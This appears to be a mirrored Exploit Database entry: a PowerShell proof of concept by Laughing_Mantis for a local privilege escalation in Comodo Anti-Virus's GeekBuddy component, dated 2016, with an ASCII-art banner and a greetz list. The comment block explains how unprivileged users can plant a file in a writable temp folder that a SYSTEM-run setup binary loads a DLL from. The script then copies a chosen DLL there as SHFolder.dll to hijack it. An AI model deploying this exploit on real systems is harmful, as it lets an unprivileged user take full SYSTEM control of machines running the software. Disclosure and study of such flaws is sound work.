Comodo Anti-Virus – ‘SHFolder.dll’ Local Privilege Escalation

• Exploit Database
• 119 阅读

• 作者： Laughing_Mantis
  日期： 2016-02-29
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39508/

• <#
  
  
   ````......```` 
  ``,;''''''''''''''''';,`
   .;''''''''''''''''''''''''''',`
   `:''''''''+';:,.``````.,:;'''''''''':` 
   ,;'''''';,.```,;'''''';: 
  `:'''''',.`,'''''';.
  `;+''+':`,;`,''''';.
  `;'''';. ``.:;'` `. `;'''''.
  `:+''';``,``:+'' ';;'`,'';`` ``:'''';`
   .'''';` ,';' '':'`';,'`'',' :''' .''` :'''', 
   `;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''` 
  .''''. ;:`, .'.':`'''.:;`;.+;:' '::; ;''' ';.'''',
   :''';` `'''',`':'' ..;:`','`'''' ':;;`'`';`':` :;:'''; 
  ;''+, .;`.'.'' ';.'`';': ,:. `` ` `,: .';',,'`;'.`';': .+'''` 
  `''''`;'; ''.'.,','` ,```;`''.`;'`''+: ;'''`
   `''''.,.'' ,'.'' ;;. ```````` `.``'::'`;; `:'''. 
   ``''':`+,`.':`'','`,;''''''''''+'':.`;'.+:;'``':.'''.
   `''','', ''`:;`:'''''''''''''''''''''';.`;'`': ''`'` .''', 
  `''', ` `''``'; .''''''''''''''''''''''''''''';``.;' ;'.''`.:`''',
   `''', :''.`'' `,;'''''''''''''''''''''''''''''''';. ``,.'::', ''`.'''. 
   ''','.''`,': ,'''''''''''''''''''''''''''''''''''''', `.+,'; '';.'''`
  ''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''.;' :': ,,`.'''
   :'';`''.'`` :''''''''''''';:::.', `''';`:;'+'''','''''+;`,'; :''' ,''' 
  .''' `` .++; `''''''''''''`. `':''';`:''' :'''''''. .+ :''.+. :'':
   `''+ :'': `` ,''''''''''''' `':'''; `: ,'''''''': .`''.'' ` '''` 
   ;''.`+.',;;'''':''''''''; `',.'''': `:''''';'''; `'.',`,',`+'' 
  ,'':'';,'.;''''':''''''''`+`;..`;'+''.'.:''''';'''''```.+'+:'`.'';
   `'''`;``+',;.`;''''':''''''''.';`;'','`'' ;''''','''''`;,+.+. ;''. 
   ;'+.:'': ;': ;'''''':''''':',''.`'';.+''`,'; .'''';''''''``+.':``''' 
  `'':.+`;''` `;'''''':''''''.::''..''. ::`'';`,'''':''''''`:+'.,'',
  '''`:''.:'' :''''''':'''''; :''''.'', `.,; :+'`''': ;''',''''''' ,`'''
   .'':`'';``,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+`.'': 
   '''`''. :',`''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''',`;'': ''' 
  .'',','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''`:'';``+':
  '''`''.,'; ;'''''';''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
   `'': .'';:;`'''''''` .+'', ,'''''''''''';'''''''++`''''':..:'''' `''''';'''''',.,`` .'', 
   ` :'':''`''''''+`;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''`.++. ''; 
   +'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.'''''';.+'''` :'+`
  ,''.': +''''';,,;''''''''''''''''''''''''''''''''''.`.::,` `';.', ;''''''`:'':`.`'';
  ;'':;.;': ,''''''.`''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.;.;'+`;''
  '': `;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;.,'''''' `;''''. .''` 
   .''..';`;'.''''''.:+;;''''''''''': ;'::::...;''+'':,'''';..``;''';.''''''; `:''.`': `'': 
   :'' `,'`;''''''.:;'''''''''''''';`;, `,''';` .:;;;'''':,'''''' .,''',''' 
   ;';''';,``''''''''''` :''''''''''';.:'''`';:`,''';`;''''''''''',''''''.;';,` :''`
  `'', .;,''';,'''''''''' ;'''''''''':` :'''`::```'''',+''''''''''''+` ;''''';.``.:;` `''.
  .''` `+;'`;`'''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''`;'';;; `+':
  :'' ..;''`''''''''''`'''''''', .'''``+''';''. ,'''''''''''''''''''''''''''''''''''''':` 
  ;'':.``.'''''''''';'''''''' ;'';;''':::` :'''''''''''''''''''''''''''''''''''''''', 
  ;':'''':`:'''''''''''''''''',`.'''''''.`+'''''''''''''''''''''''''''''''''''''''''
  '',:,;'':;''''''''''''''''''`;''...:''''` :''''''''''''''''''''''''''''''''''''''''''`
   `''. `+'':,`''''''''''''''''''; ,'';.+` . ,;'''`'''''''''''''''''''''''''''''''''''''''''';
   .''. `.,;'; '''''''''';''''''',''',+. `` .'.''' ''''''''+'''''''''''''''''''''''''''''''''', 
   .'+` ;'''''``'''''''` `;''''.'++','`+.''' '''''';`;+'''''' 
   ,''''''';; ,'''';'''';'``.''' :''''''` .'''''':
   :'+'''''': .'''';'''';'` .''' ,''''''`,''''';
   :'',''''', ''''''` .'''';'''';', .'''`.''''''` ''''''
   ;''`'''''';:''''', ''''''.'''';'''';':,''''..''''''` ''''''
   ;''`';''''':''''', :'''';:''''''''';''.'''''`''''''` ;'''''
   ;'':''''', ,''''' `+''''''''':''.'''''` ,''''';''''''
   :'+,''''', `'''''.,'''''''''':''::''''; ;''''': `''''''
   :''```.,''''':''''': `''''''''''',''+`'''''. `''''''. :''''''
   ,''` `'''''''.'''''; `''''': '''''''''''';''',,''''',''''''' ,'''''',
   .''` `''':,.;`'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .'''''''' 
   `''``,;;;''`'''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''', 
  '', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+'''''''''''''''''''''''''''''';
  '': ` `,.;'''''.`''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';'; 
  ;';,'''';:''''':`''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
  ;''';;,...''''''`''';;:''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';. 
  :'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+:'''''''';''''''''';''''';,` 
  .''. .''',` ;''''': `''':;''.````` :+'''''',;''''''','''''';..;''''''''''` `''''''`,'': `+':
   '':`.;.,'''''+.'';,'''''''';:''''''''','''''''':;'''''''''.`,''''''';''''';,'',.''.
   ''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''',''''''.':''',:''`
   :'',';:.'.;'''''' ''''.:''''''''''''''''';;'''''''''''.'''.`:;'''''':'': :'''''' ';,.:'''' 
   .''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'': 
  '';;';, ;`'''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;:,''` 
  ;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.'''''';,'+'.'''
  .''.'''';` ''''';''''''';`'''''''''''''':.'';:,;'''':`,:`:''''''''','',`:''':''''''`'.:'''`'':
   ''' :'': `:.,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.'''''';`'''..':'' 
   :''``,. ;:++`''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''';. ,+''`''; 
   `'':`'',`;:`'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,','', 
  ;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;''''''''+.''+;'''
  `'':;'';` ` ''''''':''''';`'''''''','''''''''''''''.,''''`''''',:''''`,'''''''`'''.:';.'':
   ''+`,`,+:`'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;,''' 
   .'': ;';''. .'''''';'''''',`'''''+''''''''''''''`.,'';.''''' '''''''''''': +'``;';.'', 
  ''+`:''; ,'`:''''','''''''.,''''' ,'''''''''''''':''''';''''','''';''''''; ,.''. .`` '''
  `';;`+. ;'':':''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
   :'',``'':.''`;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''``''' 
  ''' ;'.:''`;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''`.''``'+',: '''` 
  .';;`;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';''''';.,''` :`,'':
   ;'',`', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,'''';``.''';``''' 
  '''``'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''`'''` 
  .''';'.''`;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
   ,'';''.;',,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:''; 
  ;'';''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
   ''': .,,': :':+''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
  ''': ` .''`'`;'''''''..,.:+,` ``.,.`,'''`;'''''''+.';'.:'''':;'''''+:.'`
   ''': ;:`+'`,:..,''''''; .+: `:'+''''';`;'; .''''': `:';:+''';`''''''. .':
   `''';; ;'..';'`;'''',;'. .+''''''''''`;;'+:'''; .+'''''''';''''''.;,'';
  `'''','; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
   `''''` ``':. ';''.+.`''''''''''''; `'''''::'''.'''',`'''''': :';;''
   ''''.:;,'`:'.';','''''''''''':,'''','''..''': '''';;:,''. `''
  :''':`.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
   ,''''``,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
  `'''':`;'':''''''+;.;``,:`''''',`'''''`,'''' :'''.''''..''','.
  :''''..,': :'''''''.`;'''';` .''''''`'''':`+'''``''',;'''``''';:'.
   `'''''``.'` ''''''';`'''''''': ,''''';;'''`''''; ''';:'''. ;''','' 
   ,'''''``.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.: 
   :''''', .''''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '. 
  `:+'''';..;'''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
  `,''''':'''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
   .;+':''''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' + 
  .:+` '''''''`''''''+'''+.''''';.' ;''' ;''.;,'' ' ''.:``: 
  '. :'''''':.+'''''''',;''''',;: ;''; '''.'.,;,,:'' '`'
  ;; `'''''''``;'''''',`,'''''`'` ''',.''',.:;`' ''.,.`;
  .+''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
   +: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;.., 
   ,'``.. `+''''''''''+` :'`'';`''':. ,.',''.; '
   `+':'''''''''''',`+.`'',.''',. :,''''+ ; 
  .', ;''''''''''''.':''.,''':` ;.''''.,. 
   :'.:''''''''''',;'`''.:''',':;.''':.:
  ''. ,:''''',` ;+` :'.:'''' ':`''; ; 
  `'', ''. ::,''''``; :, '
  ;+;` .'+` ``'':'`,; '`` 
   ,'';.`.'';`:';'.,;'. 
  `,''';:::::;'''.``+;' +`
   `,:''''';,` ,,;
  
  
  
  SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
  
  Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
  
  ###Technical Geeky Stuff###
  
  GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
  These binaries are individual components of the Comodo Security Suite and are executed whenever
  their related function is performed, updated, or uninstalled.
  
  The directory listing is as follows:
  10/06/201512:08 AM<DIR>.
  10/06/201512:08 AM<DIR>..
  10/02/201510:43 PM27 download.cfg
  10/02/201510:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
  10/02/201510:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
  10/02/201510:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
  10/06/201512:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
  10/02/201510:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
  10/06/201512:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
  10/06/201512:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
  10/02/201510:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
  10/06/201512:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
  10/02/201510:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
  10/02/201510:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
  10/06/201512:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
  10/06/201512:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
  10/02/201510:43 PM 1 survey_version.txt
  10/06/201512:05 AM<DIR>updates
  
  The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
  
  C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
  BUILTIN\Administrators:(OI)(CI)(ID)F
  CREATOR OWNER:(OI)(CI)(IO)(ID)F
  BUILTIN\Users:(OI)(CI)(ID)R
  BUILTIN\Users:(CI)(ID)(special access:)
  FILE_WRITE_DATA
  FILE_APPEND_DATA
  FILE_WRITE_EA
  FILE_WRITE_ATTRIBUTES
  
  Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access.This allows 
  non-administrator users the ability to create files in the directory but not delete or modify 
  existing files.
  
  Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
  in the C:\Program Files (x86)\Common Files\COMODO\ folder.This service is auto launched by the 
  registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
  
  This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM 
  level privielges.This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe 
  to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
  
  During client connections to update servers and Geek Buddy executions the unit.exe binary will 
  launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe.This setup binary has 
  hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is 
  executed from.
  
  .data:00409240 dd offset aShfolder ; "SHFOLDER"
  .data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
  
  During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before 
  looking in the other PATHS variables.
  
  By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an 
  update or client connection to secure servers (which occurs automatically at user login) a user can 
  elevate their privileges to SYSTEM and compromise the system fully.
  
  
  ######### GREETZ ######################################################################################
  1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
  
  @taviso - keep killing it and thanks for being an inspiration
  @bill_billbil - sup girl chicken rico n chill
  @tacticalRCE - Its no 100 mile rides but will miss all the good times.C-ya around mang.
  @hellNBak_ - drop tehm greetz like its 2003
  @hacksforpancakes - make plans for other NullCon in 2016 ;)
  @jduck - we gonna juke some more toyotas next time you come visit
  @hdmoore - good luck with your ventures good sir
  @jsoo - dont give up good sir - you're doing awesome
  @thegrugq - when i grow up i hope im half as wise as you good sir
  @daveaitel - Triangular Anus logos are the best
  @da_667 - AYYYYYYYYYYYYYY LMAO
  @bonovoxly - Clever Girls Wear Pink on Wednesdays
  Derek Soeder - Respect to you brother, keep on being awesome
  Benny 29A - next time im in CZ lets get beers, im buying
  Yuji Ukai - #RESPECT to everything you have ever done and will ever do.#Ninja
  Sizzop - for fixing my greetz
  
  #########################################################################################################
  
  
  #>
  
  Param
  (
  
  [Parameter(ValueFromPipelineByPropertyName = $true)]
  [string]$DLL = ""
  )
  
  
  
  
  if (!(Test-Path $DLL))
  {
  throw "Fatal Error: The specified file: $DLL does not exist."
  }
  
  Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
  
  Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
  
  
  [void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
  
  $objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon 
  
  
  $MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
  $objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
  $objNotifyIcon.BalloonTipIcon = "Info" 
  $objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
  Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges" 
  $objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
   
  $objNotifyIcon.Visible = $True 
  $objNotifyIcon.ShowBalloonTip(8000)
  

  PowerShell

  Copy